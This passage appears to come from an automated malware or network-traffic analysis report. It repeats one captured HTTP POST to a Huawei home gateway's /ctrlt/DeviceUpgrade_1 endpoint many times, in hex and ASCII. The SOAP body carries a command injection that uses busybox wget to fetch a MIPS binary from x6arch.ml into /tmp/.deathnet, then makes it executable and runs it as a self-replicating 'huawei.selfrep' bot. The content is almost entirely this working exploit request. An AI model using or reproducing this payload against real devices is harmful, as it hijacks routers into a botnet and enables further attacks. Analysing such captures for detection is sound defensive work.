77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 